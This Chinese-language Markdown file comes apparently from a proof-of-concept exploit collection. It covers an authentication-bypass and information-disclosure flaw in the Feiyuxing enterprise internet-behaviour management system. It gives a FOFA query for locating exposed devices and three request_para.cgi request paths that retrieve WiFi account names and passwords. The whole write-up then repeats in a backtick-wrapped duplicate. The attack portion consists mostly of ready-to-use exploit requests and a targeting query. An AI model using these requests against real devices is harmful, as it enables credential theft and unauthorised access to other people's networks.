Awesome-POC/network-device/飞鱼星企业级智能上网行为管理系统权限绕过信息泄露漏洞.md

# 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

## 漏洞描述

飞鱼星 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞，可以获取管理员权限以及用户密码

## 漏洞影响

```
飞鱼星 企业级智能上网行为管理系统
```

## FOFA

```
title="飞鱼星企业级智能上网行为管理系统"
```

## 漏洞复现

权限绕过参考上一篇 **飞鱼星 家用智能路由 cookie.cgi 权限绕过**

信息泄露POC

```plain
/request_para.cgi?parameter=wifi_info 		 #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
```


![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162236795.png)
update gitbook 2022-02-20 16:14:31 +08:00			`# 飞鱼星企业级智能上网行为管理系统权限绕过信息泄露漏洞`

			`## 漏洞描述`

			`飞鱼星企业级智能上网行为管理系统存在权限绕过以及信息泄露漏洞，可以获取管理员权限以及用户密码`

			`## 漏洞影响`

			```
			`飞鱼星企业级智能上网行为管理系统`
			```

			`## FOFA`

			```
			`title="飞鱼星企业级智能上网行为管理系统"`
			```

			`## 漏洞复现`

			`权限绕过参考上一篇飞鱼星家用智能路由 cookie.cgi 权限绕过`

			`信息泄露POC`

			```plain
			`/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码`
			`/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码`
			`/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码`
			```



			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162236795.png)`